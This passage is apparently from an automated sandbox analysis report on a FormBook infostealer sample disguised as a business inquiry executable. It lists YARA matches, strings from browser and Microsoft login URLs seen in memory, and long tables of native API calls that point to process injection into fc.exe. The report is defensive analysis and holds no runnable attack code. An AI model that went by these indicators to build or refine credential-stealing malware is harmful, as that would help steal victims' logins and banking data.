3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fc.exe, 0000000A.00000002.2508765687.000000000472C000.00000004.10000000.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000002.2508378141.0000000003CAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 0000000A.00000002.2505857523.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 0000000A.00000003.1852296960.0000000007FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8CB43 NtClose,0_2_00E8CB43
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542B60 NtClose,LdrInitializeThunk,0_2_01542B60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01542DF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01542C70
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015435C0 NtCreateMutant,LdrInitializeThunk,0_2_015435C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01544340 NtSetContextThread,0_2_01544340
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01544650 NtSuspendThread,0_2_01544650
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542BF0 NtAllocateVirtualMemory,0_2_01542BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542BE0 NtQueryValueKey,0_2_01542BE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542B80 NtQueryInformationFile,0_2_01542B80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542BA0 NtEnumerateValueKey,0_2_01542BA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542AD0 NtReadFile,0_2_01542AD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542AF0 NtWriteFile,0_2_01542AF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542AB0 NtWaitForSingleObject,0_2_01542AB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542D10 NtMapViewOfSection,0_2_01542D10
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542D00 NtSetInformationFile,0_2_01542D00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542D30 NtUnmapViewOfSection,0_2_01542D30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542DD0 NtDelayExecution,0_2_01542DD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542DB0 NtEnumerateKey,0_2_01542DB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542C60 NtCreateKey,0_2_01542C60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542C00 NtQueryInformationProcess,0_2_01542C00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542CC0 NtQueryVirtualMemory,0_2_01542CC0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542CF0 NtOpenProcess,0_2_01542CF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542CA0 NtQueryInformationToken,0_2_01542CA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542F60 NtCreateProcessEx,0_2_01542F60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542F30 NtCreateSection,0_2_01542F30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542FE0 NtCreateFile,0_2_01542FE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542F90 NtProtectVirtualMemory,0_2_01542F90
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542FB0 NtResumeThread,0_2_01542FB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542FA0 NtQuerySection,0_2_01542FA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542E30 NtWriteVirtualMemory,0_2_01542E30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542EE0 NtQueueApcThread,0_2_01542EE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542E80 NtReadVirtualMemory,0_2_01542E80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01542EA0 NtAdjustPrivilegesToken,0_2_01542EA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01543010 NtOpenDirectoryObject,0_2_01543010
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01543090 NtSetValueKey,0_2_01543090
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015439B0 NtGetContextThread,0_2_015439B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01543D70 NtOpenThread,0_2_01543D70
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01543D10 NtOpenProcessToken,0_2_01543D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03744340 NtSetContextThread,LdrInitializeThunk,10_2_03744340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03744650 NtSuspendThread,LdrInitializeThunk,10_2_03744650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742B60 NtClose,LdrInitializeThunk,10_2_03742B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03742BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742BE0 NtQueryValueKey,LdrInitializeThunk,10_2_03742BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_03742BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742AF0 NtWriteFile,LdrInitializeThunk,10_2_03742AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742AD0 NtReadFile,LdrInitializeThunk,10_2_03742AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742F30 NtCreateSection,LdrInitializeThunk,10_2_03742F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742FE0 NtCreateFile,LdrInitializeThunk,10_2_03742FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742FB0 NtResumeThread,LdrInitializeThunk,10_2_03742FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742EE0 NtQueueApcThread,LdrInitializeThunk,10_2_03742EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_03742E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_03742D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742D10 NtMapViewOfSection,LdrInitializeThunk,10_2_03742D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_03742DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742DD0 NtDelayExecution,LdrInitializeThunk,10_2_03742DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_03742C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742C60 NtCreateKey,LdrInitializeThunk,10_2_03742C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_03742CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037435C0 NtCreateMutant,LdrInitializeThunk,10_2_037435C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_037439B0 NtGetContextThread,LdrInitializeThunk,10_2_037439B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742B80 NtQueryInformationFile,10_2_03742B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742AB0 NtWaitForSingleObject,10_2_03742AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742F60 NtCreateProcessEx,10_2_03742F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742FA0 NtQuerySection,10_2_03742FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742F90 NtProtectVirtualMemory,10_2_03742F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742E30 NtWriteVirtualMemory,10_2_03742E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742EA0 NtAdjustPrivilegesToken,10_2_03742EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742D00 NtSetInformationFile,10_2_03742D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742DB0 NtEnumerateKey,10_2_03742DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742C00 NtQueryInformationProcess,10_2_03742C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742CF0 NtOpenProcess,10_2_03742CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03742CC0 NtQueryVirtualMemory,10_2_03742CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03743010 NtOpenDirectoryObject,10_2_03743010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03743090 NtSetValueKey,10_2_03743090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03743D70 NtOpenThread,10_2_03743D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_03743D10 NtOpenProcessToken,10_2_03743D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC93B0 NtCreateFile,10_2_02EC93B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC96B0 NtClose,10_2_02EC96B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC9610 NtDeleteFile,10_2_02EC9610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC9520 NtReadFile,10_2_02EC9520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 10_2_02EC9820 NtAllocateVirtualMemory,10_2_02EC9820
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E61B910_2_00E61B91
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E78B130_2_00E78B13
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E628C00_2_00E628C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E620C90_2_00E620C9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E628BC0_2_00E628BC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E610000_2_00E61000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8F1630_2_00E8F163
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E632050_2_00E63205
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E703130_2_00E70313
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E705330_2_00E70533
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E76D0E0_2_00E76D0E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E76D130_2_00E76D13
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E5120_2_00E6E512
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E5130_2_00E6E513
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E6630_2_00E6E663
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6467A0_2_00E6467A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E6570_2_00E6E657
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015981580_2_01598158
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AA1180_2_015AA118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015001000_2_01500100
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C81CC0_2_015C81CC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D01AA0_2_015D01AA
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C41A20_2_015C41A2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A20000_2_015A2000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CA3520_2_015CA352
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151E3F00_2_0151E3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D03E60_2_015D03E6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B02740_2_015B0274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015902C00_2_015902C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015105350_2_01510535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D05910_2_015D0591
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C24460_2_015C2446
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B44200_2_015B4420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BE4F60_2_015BE4F6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015347500_2_01534750
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015107700_2_01510770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150C7C00_2_0150C7C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152C6E00_2_0152C6E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015269620_2_01526962
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015129A00_2_015129A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015DA9A60_2_015DA9A6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151A8400_2_0151A840
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015128400_2_01512840
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E8F00_2_0153E8F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F68B80_2_014F68B8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CAB400_2_015CAB40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C6BD70_2_015C6BD7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150EA800_2_0150EA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015ACD1F0_2_015ACD1F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151AD000_2_0151AD00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0150ADE00_2_0150ADE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01528DBF0_2_01528DBF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510C000_2_01510C00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01500CF20_2_01500CF2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B0CB50_2_015B0CB5
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01584F400_2_01584F40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01530F300_2_01530F30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B2F300_2_015B2F30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01552F280_2_01552F28
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01502FC80_2_01502FC8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151CFE00_2_0151CFE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158EFA00_2_0158EFA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510E590_2_01510E59
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CEE260_2_015CEE26
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CEEDB0_2_015CEEDB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01522E900_2_01522E90
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CCE930_2_015CCE93
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015DB16B0_2_015DB16B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0154516C0_2_0154516C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FF1720_2_014FF172
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0151B1B00_2_0151B1B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015170C00_2_015170C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BF0CC0_2_015BF0CC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C70E90_2_015C70E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CF0E00_2_015CF0E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FD34C0_2_014FD34C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C132D0_2_015C132D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0155739A0_2_0155739A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152B2C00_2_0152B2C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B12ED0_2_015B12ED
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015152A00_2_015152A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C75710_2_015C7571
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D95C30_2_015D95C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015AD5B00_2_015AD5B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015014600_2_01501460
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CF43F0_2_015CF43F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CF7B00_2_015CF7B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015556300_2_01555630
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C16CC0_2_015C16CC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015199500_2_01519950
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152B9500_2_0152B950
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015A59100_2_015A5910
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0157D8000_2_0157D800
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015138E00_2_015138E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CFB760_2_015CFB76
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01585BF00_2_01585BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0154DBF90_2_0154DBF9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152FB800_2_0152FB80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CFA490_2_015CFA49
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C7A460_2_015C7A46
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01583A6C0_2_01583A6C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BDAC60_2_015BDAC6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01555AA00_2_01555AA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015ADAAC0_2_015ADAAC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015B1AA30_2_015B1AA3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C1D5A0_2_015C1D5A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01513D400_2_01513D40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015C7D730_2_015C7D73
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152FDC00_2_0152FDC0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01589C320_2_01589C32
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CFCF20_2_015CFCF2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CFF090_2_015CFF09
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D3FD50_2_014D3FD5
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014D3FD20_2_014D3FD2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01511F920_2_01511F92
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015CFFB10_2_015CFFB1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01519EB00_2_01519EB0
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039ACFD19_2_039ACFD1
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039A31919_2_039A3191
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039AD17A9_2_039AD17A
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039AD16E9_2_039AD16E
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeCode function: 9_2_039AD02A9_2_039AD02A
